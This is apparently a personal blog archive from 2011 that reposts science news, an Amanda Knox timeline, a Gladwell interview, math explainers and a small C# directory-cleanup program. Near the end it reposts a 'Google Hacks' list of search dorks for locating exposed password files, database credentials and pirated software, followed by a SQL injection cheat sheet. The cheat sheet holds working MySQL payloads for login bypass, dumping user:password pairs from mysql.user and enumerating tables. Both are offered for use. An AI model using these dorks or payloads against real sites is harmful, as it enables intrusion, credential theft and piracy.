I want one!
Thursday, October 20, 2011
Friday, October 14, 2011
The International Aquatic Plants Layout Contest 2009
A friend of mine is into this hobby, aquatic plantscapes. A heavy emphasis is placed on the ecosystem and artistic design elements. There are some really cool tank setups on this page.
Tuesday, October 4, 2011
The 2011 Nobel Prize in Physics - Surprise!
Written in the stars
"Some say the world will end in fire, some say in ice..." *
What will be the final destiny of the Universe? Probably it will end in ice, if we are to believe this year's Nobel Laureates in Physics. They have studied several dozen exploding stars, called supernovae, and discovered that the Universe is expanding at an ever-accelerating rate. The discovery came as a complete surprise even to the Laureates themselves.
In 1998, cosmology was shaken at its foundations as two research teams presented their findings. Headed by Saul Perlmutter, one of the teams had set to work in 1988. Brian Schmidt headed another team, launched at the end of 1994, where Adam Riess was to play a crucial role.
The research teams raced to map the Universe by locating the most distant supernovae. More sophisticated telescopes on the ground and in space, as well as more powerful computers and new digital imaging sensors (CCD, Nobel Prize in Physics in 2009), opened the possibility in the 1990s to add more pieces to the cosmological puzzle.
The teams used a particular kind of supernova, called type Ia supernova. It is an explosion of an old compact star that is as heavy as the Sun but as small as the Earth. A single such supernova can emit as much light as a whole galaxy. All in all, the two research teams found over 50 distant supernovae whose light was weaker than expected - this was a sign that the expansion of the Universe was accelerating. The potential pitfalls had been numerous, and the scientists found reassurance in the fact that both groups had reached the same astonishing conclusion.
For almost a century, the Universe has been known to be expanding as a consequence of the Big Bang about 14 billion years ago. However, the discovery that this expansion is accelerating is astounding. If the expansion will continue to speed up the Universe will end in ice.
The acceleration is thought to be driven by dark energy, but what that dark energy is remains an enigma - perhaps the greatest in physics today. What is known is that dark energy constitutes about three quarters of the Universe. Therefore the findings of the 2011 Nobel Laureates in Physics have helped to unveil a Universe that to a large extent is unknown to science. And everything is possible again.
Read more about this year's prize |
Information for the Public Pdf 4,9 MB |
Scientific Background Pdf 1 MB |
In order to read the text you need Acrobat Reader. |
Links and Further Reading |
An amazing discovery was made by the 2011 Nobel Prize winner in Physics. During an effort to measure the rate at which the expansion of the universe (caused by the Big Bang), scientists were shocked to discover that the rate of expansion is actually increasing. Scientists are baffled. Some postulate that energy from dark matter is the force causing the increase.
I think God is smiling as he watches us scratch our heads. How can the rate of expansion resulting from one cosmic explosion (Big Bang) be getting faster? Our current understanding of Physics tells us it should be slowing down. Common sense tells us the same. I love it when science reveals another mystery about our universe that supports, not contradicts, belief in God.
Monday, October 3, 2011
Amanda Knox verdict: Freed as appeal court overturns murder conviction
KEY DATES IN THE CONVICTION OF AMANDA KNOX
Nov 2, 2007: Body of Meredith Kercher is found in Perugia apartment. Investigators say she was killed the night before.
Nov 6, 2007: Knox is arrested with then-boyfriend Raffaele Sollecito, and Diya 'Patrick' Lumumba, Congolese owner of pub where Knox occasionally worked.
Nov 20, 2007: Lumumba, implicated by Knox statements to police, is released from jail for lack of evidence.
Dec 6, 2007: Ivory Coast national Rudy Hermann Guede is extradited from Germany, where he was arrested, and jailed upon arrival in Italy.
Dec 14, 2007: Meredith is laid to rest after funeral in London.
Oct 28, 2008: Judge indicts Knox and Sollecito on murder and sexual assault charges. Guede, who was granted a fast-track trial, is convicted of murder and sexual assault and sentenced to 30 years in prison.
Jan 16, 2009: Trial of Knox and Sollecito opens in Perugia.
Jun 12, 2009: Knox takes stand; tells court she was shocked by Meredith's death, offers alibi and says police beat her into making false statements.
Dec 4, 2009: Court finds Knox guilty of murder and sexual assault; sentences her to 26 years in prison. Sollecito is convicted of same charges and sentenced to 25 years.
Dec 22, 2009: Appeals court upholds Guede conviction and cuts sentence to 16 years.
Nov 8, 2010: Judge orders Knox to stand trial on slander charges for claiming police beating.
Nov 24, 2010: Appeals trial for Knox and Sollecito opens in Perugia.
Dec 16, 2010: Italy's highest criminal court upholds Guede's conviction and 16-year prison sentence.
June 29, 2011: Independent forensic report ordered by appeals court finds much of the DNA evidence used to convict Knox and Sollecito is unreliable.
October 3, 2011: Knox and Sollecito are freed after appeals court overturns conviction for murder.
Good timeline of Kercher murder and Knox 4-year drama. I followed this story the whole time and thought that she was innocent at the beginning. It just didn't add up. So when the verdict to overturn her conviction was reached today, I was watching it live and was actually holding my breath. I'm very glad for the outcome. Welcome home Amanda.
Knox Evidence Questions lead to Acquittal | Fox News
Over the course of the appeals trial, the defendants' positions have significantly improved, mainly because a court-ordered independent review cast serious doubts over the main DNA evidence linking the two to the crime.
Prosecutors maintain that Knox's DNA was found on the handle of a kitchen knife believed to be the murder weapon, and that Kercher's DNA was found on the blade. They said Sollecito's DNA was on the clasp of Kercher's bra as part of a mix of evidence that also included the victim's genetic profile.
But the independent review -- ordered at the request of the defense, which had always disputed those findings -- reached a different conclusion.
The two experts found that police conducting the investigation had made glaring errors in evidence-collecting and that below-standard testing and possible contamination raised doubts over the attribution of DNA traces, both on the blade and on the bra clasp, which was collected from the crime scene 46 days after the murder.
The review was crucial in the case because no motive has emerged and witness testimony was contradictory. It was a huge boost for the defense's hope and a potentially fatal blow for the prosecution.
The prosecutors, however, refute the review and stand by their original conclusions.
Knox Awaits Verdict After Pleading For Freedom In Italian Court | Fox News
I'm very glad for her. I thought she was innocent from the beginning of this 4 year nightmare.
Thursday, September 29, 2011
Amazon Silk | The official blog of the Amazon Silk team
Introducing Amazon Silk
September 28, 2011 by The Amazon Silk Team 429 Comments
Today in New York, Amazon introduced Silk, an all-new web browser powered by Amazon Web Services (AWS) and available exclusively on the just announced Kindle Fire. You might be asking, “A browser? Do we really need another one?” As you’ll see in the video below, Silk isn’t just another browser. We sought from the start to tap into the power and capabilities of the AWS infrastructure to overcome the limitations of typical mobile browsers. Instead of a device-siloed software application, Amazon Silk deploys a split-architecture. All of the browser subsystems are present on your Kindle Fire as well as on the AWS cloud computing platform. Each time you load a web page, Silk makes a dynamic decision about which of these subsystems will run locally and which will execute remotely. In short, Amazon Silk extends the boundaries of the browser, coupling the capabilities and interactivity of your local device with the massive computing power, memory, and network connectivity of our cloud.
We’ll have a lot more to say about Amazon Silk in the coming weeks and months, so please check back with us often. You can also follow us on Twitter at @AmazonSilk. Finally, if you’re interested in learning more about career opportunities on the Amazon Silk team, please visit our jobs page.
Monday, May 16, 2011
Science - Scientists find genetic link to depression
Scientists have for the first time confirmed a specific genetic link to depression, according to new evidence published in the American Journal of Psychiatry on Monday.
The discovery, made independently by research teams in the UK and US, is expected to lead to a better biological understanding of the condition and eventually to more effective antidepressants.
Friday, May 13, 2011
Dumb-Funny Jokes
Thursday, April 21, 2011
gladwell dot com - outliers
What is Outliers about?1. What is an outlier?
"Outlier" is a scientific term to describe things or phenomena that lie outside normal experience. In the summer, in Paris, we expect most days to be somewhere between warm and very hot. But imagine if you had a day in the middle of August where the temperature fell below freezing. That day would be outlier. And while we have a very good understanding of why summer days in Paris are warm or hot, we know a good deal less about why a summer day in Paris might be freezing cold. In this book I'm interested in people who are outliers—in men and women who, for one reason or another, are so accomplished and so extraordinary and so outside of ordinary experience that they are as puzzling to the rest of us as a cold day in August.
2. Why did you write Outliers?
I write books when I find myself returning again and again, in my mind, to the same themes. I wrote Tipping Point because I was fascinated by the sudden drop in crime in New York City—and that fascination grew to an interest in the whole idea of epidemics and epidemic processes. I wrote Blink because I began to get obsessed, in the same way, with the way that all of us seem to make up our minds about other people in an instant—without really doing any real thinking. In the case of Outliers, the book grew out a frustration I found myself having with the way we explain the careers of really successful people. You know how you hear someone say of Bill Gates or some rock star or some other outlier—"they're really smart," or "they're really ambitious?' Well, I know lots of people who are really smart and really ambitious, and they aren't worth 60 billion dollars. It struck me that our understanding of success was really crude—and there was an opportunity to dig down and come up with a better set of explanations.
3. In what way are our explanations of success "crude?"
That's a bit of a puzzle because we certainly don't lack for interest in the subject. If you go to the bookstore, you can find a hundred success manuals, or biographies of famous people, or self-help books that promise to outline the six keys to great achievement. (Or is it seven?) So we should be pretty sophisticated on the topic. What I came to realize in writing Outliers, though, is that we've been far too focused on the individual—on describing the characteristics and habits and personality traits of those who get furthest ahead in the world. And that's the problem, because in order to understand the outlier I think you have to look around them—at their culture and community and family and generation. We've been looking at tall trees, and I think we should have been looking at the forest.
4. Can you give some examples?
Sure. For example, one of the chapters looks at the fact that a surprising number of the most powerful and successful corporate lawyers in New York City have almost the exact same biography: they are Jewish men, born in the Bronx or Brooklyn in the mid-1930's to immigrant parents who worked in the garment industry. Now, you can call that a coincidence. Or you can ask—as I do—what is about being Jewish and being part of the generation born in the Depression and having parents who worked in the garment business that might have something to do with turning someone into a really, really successful lawyer? And the answer is that you can learn a huge amount about why someone reaches the top of that profession by asking those questions.
5. Doesn't that make it sound like success is something outside of an individual's control?
I don't mean to go that far. But I do think that we vastly underestimate the extent to which success happens because of things the individual has nothing to do with. Outliers opens, for example, by examining why a hugely disproportionate number of professional hockey and soccer players are born in January, February and March. I'm not going to spoil things for you by giving you the answer. But the point is that very best hockey players are people who are talented and work hard but who also benefit from the weird and largely unexamined and peculiar ways in which their world is organized. I actually have a lot of fun with birthdates in Outliers. Did you know that there's a magic year to be born if you want to be a software entrepreneur? And another magic year to be born if you want to be really rich? In fact, one nine year stretch turns out to have produced more Outliers than any other period in history. It's remarkable how many patterns you can find in the lives of successful people, when you look closely.
6. What's the most surprising pattern you uncovered in the book?
It's probably the chapter nearly the end of Outliers where I talk about plane crashes. How good a pilot is, it turns out, has a lot to do with where that pilot is from—that is, the culture he or she was raised in. I was actually stunned by how strong the connection is between culture and crashes, and it's something that I would never have dreamed was true, in a million years.
7. Wait. Does this mean that there are some airlines that I should avoid?
Yes. Although, as I point out in Outliers, by acknowledging the role that culture plays in piloting, some of the most unsafe airlines have actually begun to clean up their act.
8. In Tipping Point, you had an entire chapter on suicide. In Blink, you ended the book with a long chapter on the Diallo shooting—and now plane crashes. Do you have a macabre side?
Yes! I'm a frustrated thriller writer! But seriously, there's a good reason for that. I think that we learn more from extreme circumstances than anything else; disasters tell us something about the way we think and behave that we can't learn from ordinary life. That's the premise of Outliers. It's those who lie outside ordinary experience who have the most to teach us.
9. How does this book compare to Blink and The Tipping Point?
It's different, in the sense that it's much more focused on people and their stories. The subtitle—"The Story of Success"—is supposed to signal that. A lot of the book is an attempt to describe the lives of successful people, but to tell their stories in a different way than we're used to. I have a chapter that deals, in part, with explaining the extraordinary success of Bill Gates. But I'm not interested in anything that happened to him past the age of about 17. Or I have a chapter explaining why Asian schoolchildren are so good at math. But it's focused almost entirely on what the grandparents and great-grandparents and great-great grandparents of those schoolchildren did for a living. You'll meet more people in Outliers than in my previous two books.
10. What was your most memorable experience in researching Outliers?
There were so many! I'll never forget the time I spent with Chris Langan, who might be the smartest man in the world. I've never been able to feel someone's intellect before, the way I could with him. It was an intimidating experience, but also profoundly heartbreaking—as I hope becomes apparent in "The Trouble with Geniuses" chapter. I also went to south China and hung out in rice paddies, and went to this weird little town in eastern Pennsylvania where no one ever has a heart attack, and deciphered aircraft "black box" recorders with crash investigators. I should warn all potential readers that once you get interested in the world of plane crashes, it becomes very hard to tear yourself away. I'm still obsessed.
11. What do you want people to take away from Outliers?
I think this is the way in which Outliers is a lot like Blink and Tipping Point. They are all attempts to make us think about the world a little differently. The hope with Tipping Point was it would help the reader understand that real change was possible. With Blink, I wanted to get people to take the enormous power of their intuition seriously. My wish with Outliers is that it makes us understand how much of a group project success is. When outliers become outliers it is not just because of their own efforts. It's because of the contributions of lots of different people and lots of different circumstances— and that means that we, as a society, have more control about who succeeds—and how many of us succeed—than we think. That's an amazingly hopeful and uplifting idea.
12. I noticed that the book is dedicated to "Daisy." Who is she?
Daisy is my grandmother. She was a remarkable woman, who was responsible for my mother's success—for the fact that my mother was able to get out of the little rural village in Jamaica where she grew up, get a University education in England and ultimately meet and marry my father. The last chapter of Outliers is an attempt to understand how Daisy was able to make that happen—using all the lessons learned over the course of the book. I've never written something quite this personal before. I hope readers find her story as moving as I did.
Anybody read Malcolm Gladwell? Tripping Point, Blink and Outliers? I haven't but after reading this I'm going to. Sounds extremely interesting.
The Great Silence: the Controversy Concerning Extraterrestrial Intelligent Life
Great read if you're into pondering ways to predict the likeliness of extraterrestrial life in our galaxy.
Hamiltonian path
In the mathematical field of graph theory, a Hamiltonian path (or traceable path) is a path in an undirected graph that visits each vertex exactly once. A Hamiltonian cycle (or Hamiltonian circuit) is a cycle in an undirected graph which visits each vertex exactly once and also returns to the starting vertex. Determining whether such paths and cycles exist in graphs is the Hamiltonian path problem which is NP-complete.
Hamiltonian paths and cycles are named after William Rowan Hamilton who invented the Icosian game, now also known as Hamilton's puzzle, which involves finding a Hamiltonian cycle in the edge graph of the dodecahedron. Hamilton solved this problem using the Icosian Calculus, an algebraic structure based on roots of unity with many similarities to the quaternions (also invented by Hamilton). This solution does not generalize to arbitrary graphs.
Wednesday, April 20, 2011
European collaboration breakthrough in developing graphene : News : News + Events : National Physical Laboratory
A collaborative research project has brought the world a step closer to producing a new material on which future nanotechnology could be based. Researchers across Europe, including NPL, have demonstrated how an incredible material, graphene, could hold the key to the future of high-speed electronics, such as micro-chips and touchscreen technology.
Graphene, only one atom thick, climbs terraces on the surface of a silicone carbide substrate. This picture of a graphene device was taken with an atomic force microscope by NPL's Dr Olga Kazakova Graphene has long shown potential, but has previously only been produced on a very small scale, limiting how well it could be measured, understood and developed. A paper published in Nature Nanotechnology explains how researchers have, for the first time, produced graphene to a size and quality where it can be practically developed and successfully measured its electrical characteristics. These significant breakthroughs overcome two of the biggest barriers to scaling up the technology.
A technology for the future
Graphene is a relatively new form of carbon made up of a single layer of atoms arranged in a honeycomb shaped lattice. Despite being one atom thick and chemically simple, graphene is extremely strong and highly conductive, making it ideal for high-speed electronics, photonics and beyond.
Graphene is a strong candidate to replace semiconductor chips. Moore's Law observes that the density of transistors on an integrated circuit doubles every two years, but silicon and other existing transistor materials are thought to be close to the minimum size where they can remain effective. Graphene transistors can potentially run at faster speeds and cope with higher temperatures. Graphene could be the solution to ensuring computing technology to continue to grow in power whilst shrinking in size, extending the life of Moore's law by many years.
Large microchip manufacturers, such as IBM and Intel, have openly expressed interest in the potential of graphene as a material on which future computing could be based.
Graphene also has potential for exciting new innovations such as touchscreen technology, LCD displays and solar cells. Its unparalleled strength and transparency make it perfect for these applications, and its conductivity would offers a dramatic increase in efficiency on existing materials.
Growing to a usable size while maintaining quality
Until now, graphene of sufficient quality has only been produced in the form of small flakes of tiny fractions of a millimeter, using painstaking methods such as peeling layers off graphite crystals with sticky tape. Producing useable electronics requires much larger areas of material to be grown. This project saw researchers, for the first time, produce and successfully operate a large number of electronic devices from a sizable area of graphene layers (approximately 50 mm2).
The graphene sample, was produced epitaxially - a process of growing one crystal layer on another - on silicon carbide. Having such a significant sample not only proves that it can be done in a practical, scalable way, but also allows the scientists to better understand important properties.
Measuring resistance
The second key breakthrough of the project was measuring graphene's electrical characteristics with unprecedented precision, paving the way for convenient and accurate standards to be established. For products such as transistors in computers to work effectively and be commercially viable, manufacturers must be able to make such measurements with incredible accuracy against an agreed international standard.
The international standard for electrical resistance is provided by the quantum Hall effect, a phenomenon whereby electrical properties in 2D materials can be determined based only on fundamental constants of nature. The effect has, until now, only been demonstrated with sufficient precision in a small number of conventional semiconductors. Furthermore, such measurements need temperatures close to absolute zero, combined with very strong magnetic fields, and only a few specialised laboratories in the world can achieve these conditions.
Graphene was long tipped to provide an even better standard, but samples were inadequate to prove this. By producing samples of sufficient size and quality, and accurately demonstrate Hall resistance, the team proved that graphene has the potential to supersede conventional semiconductors on a mass scale.
Furthermore, graphene shows the quantum Hall effect at much higher temperatures. This means the graphene resistance standard could be used much more widely as more labs can achieve the conditions required for its use. In addition to its advantages of operating speed and durability, this would also speed the production and reduce costs of future electronics technology based on graphene.
NPL's Professor Alexander Tzalenchuk, and the lead author on the Nature Nanotechnology paper, observes:
"It is truly sensational that a large area of epitaxial graphene demonstrated not only structural continuity, but also the degree of perfection required for precise electrical measurements on par with conventional semiconductors with a much longer development history."
Where now?
The research team are hoping to go on to demonstrate even more precise measurement, as well as accurate measurement at even higher temperatures. They are currently seeking EU funding to drive this forward.
Dr JT Janssen, an NPL Fellow who worked on the project, said:
"We’ve laid the groundwork for the future of graphene production, and will strive in our ongoing research to provide greater understanding of this exciting material. The challenge for industry in the coming years will be to scale the material up in a practical way to meet new technology demands. We have taken a huge step forward, and once the manufacturing processes are in place, we hope graphene will offer the world a faster and cheaper alternative to conventional semiconductors."
The research was a joint project carried by the National Physical Laboratory (UK), Chalmers University of Technology (Göteborg, Sweden), Politecnico di Milano (Italy), Linköping University (Sweden) and Lancaster University (UK).
For for further information, please contact Alexander Tzalenchuk
Find out more about NPL's research into Quantum Phenomena
Published: 19 Jan 2010
Riemann Zeta Function -- from Wolfram MathWorld
The Riemann zeta function is an extremely important special function of mathematics and physics that arises in definite integration and is intimately related with very deep results surrounding the prime number theorem. While many of the properties of this function have been investigated, there remain important fundamental conjectures (most notably the Riemann hypothesis) that remain unproved to this day. The Riemann zeta function zeta(s) is defined over the complex plane for one complex variable, which is conventionally denoted s (instead of the usual z) in deference to the notation used by Riemann in his 1859 paper that founded the study of this function (Riemann 1859). It is implemented in Mathematica as Zeta[s].
Riemann was THE MAN
Prisoner's dilemma
The prisoner's dilemma is a fundamental problem in game theory that demonstrates why two people might not cooperate even if it is in both their best interests to do so. It was originally framed by Merrill Flood and Melvin Dresher working at RAND in 1950. Albert W. Tucker formalized the game with prison sentence payoffs and gave it the "prisoner's dilemma" name (Poundstone, 1992).
A classic example of the prisoner's dilemma (PD) is presented as follows:
- Two suspects are arrested by the police. The police have insufficient evidence for a conviction, and, having separated the prisoners, visit each of them to offer the same deal. If one testifies for the prosecution against the other (defects) and the other remains silent (cooperates), the defector goes free and the silent accomplice receives the full 10-year sentence. If both remain silent, both prisoners are sentenced to only six months in jail for a minor charge. If each betrays the other, each receives a five-year sentence. Each prisoner must choose to betray the other or to remain silent. Each one is assured that the other would not know about the betrayal before the end of the investigation. How should the prisoners act?
If we assume that each player cares only about minimizing his or her own time in jail, then the prisoner's dilemma forms a non-zero-sum game in which two players may each either cooperate with or defect from (betray) the other player. In this game, as in most game theory, the only concern of each individual player (prisoner) is maximizing his or her own payoff, without any concern for the other player's payoff. The unique equilibrium for this game is a Pareto-suboptimal solution, that is, rational choice leads the two players to both play defect, even though each player's individual reward would be greater if they both played cooperatively.
In the classic form of this game, cooperating is strictly dominated by defecting, so that the only possible equilibrium for the game is for all players to defect. No matter what the other player does, one player will always gain a greater payoff by playing defect. Since in any situation playing defect is more beneficial than cooperating, all rational players will play defect, all things being equal.
In the iterated prisoner's dilemma, the game is played repeatedly. Thus each player has an opportunity to punish the other player for previous non-cooperative play. If the number of steps is known by both players in advance, economic theory says that the two players should defect again and again, no matter how many times the game is played. However, this analysis fails to predict the behavior of human players in a real iterated prisoners dilemma situation, and it also fails to predict the optimum algorithm when computer programs play in a tournament. Only when the players play an indefinite or random number of times can cooperation be an equilibrium, technically a subgame perfect equilibrium meaning that both players defecting always remains an equilibrium and there are many other equilibrium outcomes. In this case, the incentive to defect can be overcome by the threat of punishment.
In casual usage, the label "prisoner's dilemma" may be applied to situations not strictly matching the formal criteria of the classic or iterative games, for instance, those in which two entities could gain important benefits from cooperating or suffer from the failure to do so, but find it merely difficult or expensive, not necessarily impossible, to coordinate their activities to achieve cooperation.
I found this to be fascinating. Yes, I'm a total geek.
German Tree Wows Visitors by Being Decorated With 9,800 Easter Eggs
AP
April 11: Luna Lutz visits at a tree with 9,800 Easter eggs at the garden of pensionar couple Christa and Volker Kraft in Saalfeld, Germany.
SAALFELD, Germany -- Volker Kraft's apple sapling sported just 18 eggs when he first decorated it for Easter in 1965. Decades later, the sturdy tree is festooned with 9,800 eggs, artfully decorated with everything from sequins to sea shells.
Decking trees with hollowed-out, painted eggs for Easter is popular in Germany, but the 75-year-old retiree's annual creation has become something special. Last year, it drew more than 13,000 visitors.
Kraft needs two weeks and countless trips up and down his ladder to hang the eggs and the task has become a little heavier each year since he began the decorations in 1965.
"I wanted to decorate a tree with Easter eggs for my children," Kraft said.
Kraft started with plastic eggs. Each year, the project grew; he switched to real eggs and enlisted his three children's help in blowing out and painting them.
His daughter, Gabriela Rumrich, says she started painting "simple decorations like flowers" aged four and didn't stop until she was 40. She still remembers her parents' Easter passion fondly.
"I love my hometown, Saalfeld, and that's why I started to paint pictures of the city on to the eggs," she told Associated Press Television News. "First easy ones, then more difficult ones."
Some of Gabriela's creations have been retired from the tree and are now kept in glass cases, safe from the wind and birds.
But there are plenty of eye-catching designs in their place: eggs covered in Baltic Sea shells or in elaborate crochet work, or with elaborate patterns drilled in their shells.
Many are the work of Kraft's wife, Christa, 74, who spends long winter evenings preparing the show.
"I need about one to two hours to crochet one egg depending on the thickness of thread, but also on the amount of beads I use," she said.
Over the years, word of the Krafts' tree has spread well beyond Saalfeld, a pretty eastern town of some 27,000 people nestled in the Saale valley.
The eggs now draw visitors from across Germany. The Krafts have responded to demand by making extra eggs each year to sell as souvenirs for about $7.10 each.
But there are limits to Volker Kraft's ambitions.
He plans to add another 200 eggs next year, bringing his total to 10,000 — and then stop, if only because he's running out of room to store the mountain of boxes.
Friday, April 15, 2011
C# Traverse Directory Tree Recursive - Delete empty directories
using System.IO;
using System.Linq;
namespace DeleteEmptyDirs
{
internal class Program
{
private static void Main(string[] args)
{
WalkDirectoryTree(new DirectoryInfo(args[0]));
}
private static void WalkDirectoryTree(DirectoryInfo root)
{
DirectoryInfo[] subDirs = null;
if (IsDirectoryEmpty(root.FullName))
root.Delete();
else
subDirs = root.GetDirectories();
if (subDirs == null)
return;
foreach (var dirInfo in subDirs)
WalkDirectoryTree(dirInfo);
}
public static bool IsDirectoryEmpty(string path)
{
return !Directory.EnumerateFileSystemEntries(path).Any();
}
}
}
Thursday, April 14, 2011
Google Hacks
Manipulate the google engine by using it to locate mp3 files online as well as some free software, and more! Using Google, and some finely crafted searches we can find a lot of interesting information.
For Example we can find:
Passwords
Software / MP3′s
etc.Presented below is just a sample of interesting searches that we can send to google to obtain info. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.
Try a few of these searches:
intitle:”Index of” passwords modified
allinurl:auth_user_file.txt
“access denied for user” “using password”
“A syntax error has occurred” filetype:ihtml
allinurl: admin mdb
“ORA-00921: unexpected end of SQL command”
inurl:passlist.txt
“Index of /backup”
“Chatologica MetaSearch” “stack tracking:”And these:
“parent directory ” /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory “Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” Name of Singer or album -xxx -html -htm -php -shtml -
opendivx -md5 -md5sumsNotice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.
METHOD 2
put this string in google search:
intitle:index.of mp3
You only need add the name of the song/artist/singer. Example: intitle:index.of mp3 jacksonMETHOD 3
put this string in google search:
inurl:microsoft filetype:iso
You can change the string to watever you want, ex. microsoft to adobe, iso to
zip etc…“AutoCreate=TRUE password=*”
This searches the password for “Website Access Analyzer”, a Japanese software that creates webstatistics. For those who can read Japanese, check out the
author’s site at: coara.or.jp/~passy/ [coara.or.jp/~passy/]“http://*:*@www” domainname
This is a query to get inline passwords from search engines (not just Google),
you must type in the query followed with the the domain name without the .com
or .netAnother way is by just typing
“http://bob:bob@www”“sets mode: +k”
This search reveals channel keys (passwords) on IRC as revealed from IRC chat
logs.allinurl: admin mdb
Not all of these pages are administrator’s access databases containing
usernames, passwords and other sensitive information, but many are!allinurl:auth_user_file.txt
DCForum’s password file. This file gives a list of (crackable) passwords,
usernames and email addresses for DCForum and for DCShop (a shopping cart
program(!!!). Some lists are bigger than others, all are fun, and all belong to
googledorks. =)intitle:”Index of” config.php
This search brings up sites with “config.php” files. To skip the technical
discussion, this configuration file contains both a username and a password for
an SQL database. Most sites with forums run a PHP message base. This file gives
you the keys to that forum, including FULL ADMIN access to the database.eggdrop filetype:user user
These are eggdrop config files. Avoiding a full-blown descussion about eggdrops
and IRC bots, suffice it to say that this file contains usernames and passwords
for IRC users.
Friday, April 8, 2011
Thursday, April 7, 2011
Wednesday, April 6, 2011
SQL Injection Pocket Reference
SQL Injection Pocket Reference
Testing Version MySQL-specific code Retrieving DB usernames/passwords Tables & Columns
- Finding out column #
- Retrieving Tables
- Retrieving Columns
- PROCEDURE ANALYSE()
- Retrieving Multiple Tables/Columns at once
- Find Tables from Column Name
- Find Column From Table Name
Avoiding the use of single/double quotations String concatenation Privileges FILE privilege Out Of Band Channeling Reading Files (requires FILE privilege) Writing Files (requires FILE privilege) Stacked Queries with PDO User Defined Functions Fuzzing and Obfuscation Operators Constants MySQL Functions() MySQL Password Hashing (Taken from MySQL website) MySQL Password() Cracker MySQL < 4.1 Password Cracker MSSQL
- Default Databases
- Comment Out Query
- Testing Version
- Retrieving user names/passwords
- Database Server Hostname
- Listing Databases
- Tables & Columns
OPENROWSET Attacks System Command Execution SP_PASSWORD (Hiding Query) Stacked Queries Fuzzing and Obfuscation MSSQL Password Hashing MSSQL Password Cracker ORACLE Tables & Columns Fuzzing and Obfuscation Out Of Band Channeling Credits
I would like to thank .mario, Reiners and everyone else who help me put this together. You can reach me at twitter.com/LightOS for any suggestions you may have or if there's something you think should be on here. Remember this is still a work in progress, so this doc will be updated frequently.
MySQL
Default Databases
- mysql (Privileged)
- information_schema (Version >= 5)
Comment Out Query
- #
- /*
- -- -
- ;%00
- `
Example:
- ' OR 1=1 -- -' ORDER BY id;
- ' UNION SELECT 1, 2, 3`
Note:The backtick can only be used to end a query when used as an alias.Testing Injection
- False
- The query is invalid (MySQL errors/missing content on website)
True
- The query is valid (Content is displayed as usual)
Strings
- ' - False
- '' - True
- " - False
- "" - True
- \ - False
- \\ - True
Numeric
- AND 0 - False
- AND 1 - True
- 2-1 - 1
- 3-2 - 1
In a login
- ' OR '1
- ' OR 1 -- -
- '='
- 'LIKE'
- '=0-- -
Example:
- SELECT * FROM Users WHERE username = 'Mike' AND password = ''=''
- " OR "" = "
- " OR 1 = 1 -- -
Example: SELECT * FROM Users WHERE username = 'Mike' AND password = 'anypassword' OR '' = ''Note:
- You can use as many apostrophes/quotations as you want as long as they pair up
- SELECT * FROM Articles WHERE id = '121'''''''''''''' - This is valid
- It's also possible to continue the statement after the chain of quotes: SELECT '1'''''''"" UNION SELECT 2 # 1 and 2
- Quotes escape quotes: SELECT '1''' # 1'
Testing Version
- VERSION();
- @@VERSION;
Example: ' AND MID(VERSION(),1,1) = '5 - True if MySQL version is 5MySQL-specific code
MySQL allows you to specify the version number after the exclamation mark. The syntax within the comment is only executed if the version is greater or equal to the specified version number.Example: UNION SELECT /*!50000 5,null;%00x%A0*//*!40000 4,null-- ,*//*!30000 3,null-- x*/,null-- - (UNION with 2 columns)Note:
- You can use comments in between the name and the parenthesis
- Example: VERSION/**/()
- Output will contain -nt-log in case the DBMS runs on a Windows based machine
Retrieving DB usernames/passwords
- Database.Table: mysql.user (Privileged)
- Columns: user, password
- Current User: user(), system_user()
Example:
- UNION SELECT CONCAT(user, 0x3A, password) FROM mysql.user WHERE user = 'root'
Tables & Columns
Finding out column #
- Order By:
- ORDER BY 1
- ORDER BY 2
- ORDER BY ...
Note:Keep incrementing the number until you get a False response.
Example:
- 1' ORDER BY 1-- - True
- 1' ORDER BY 2-- - True
- 1' ORDER BY 3-- - True
- 1' ORDER BY 4-- - False (Only 3 Columns)
- -1' UNION SELECT 1,2,3-- -
- Error Based:
- AND (SELECT * FROM SOME_TABLE) = 1
- Operand should contain 3 column(s)
Note:This works if you know the table name you're after and error showing is enabledRetrieving Tables
- Union:
- UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;
Blind:
- AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'
Error:
- AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2)))
- (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0);
Note:
- version=9 for MySQL 4
- version=10 for MySQL 5
Retrieving Columns
- Union:
- UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'
Blind:
- AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'
Error:
- AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2)))
- (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0);
- AND (1,2,3) = (SELECT * FROM SOME_TABLE UNION SELECT 1,2,3 LIMIT 1)-- Fixed in MySQL 5.1
Procedure Analyse():
- Refer to PROCEDURE ANALYSE() below.
Note:
The GROUP_CONCAT() function allows grouping of the tables/columns, instead of viewing them one at a time.Note:
- Output is limited to 1024 chars by default.
- All default database table names: ~900 chars
- All default database column names: ~6000 chars
PROCEDURE ANALYSE()
- 1 PROCEDURE ANALYSE() #get first column name
- 1 LIMIT 1,1 PROCEDURE ANALYSE() #get second column name
- 1 LIMIT 2,1 PROCEDURE ANALYSE() #get third column name
Note:
It is necessary that the webapp will display the first selected column of the SQL query you are injecting to.Retrieving Multiple Tables/Columns at once
- UNION SELECT MID(GROUP_CONCAT('<br>','Table: ',table_name,'<br>','Column: ',column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR '<br>'),1,1024) FROM information_schema.columns
Find Tables from Column Name
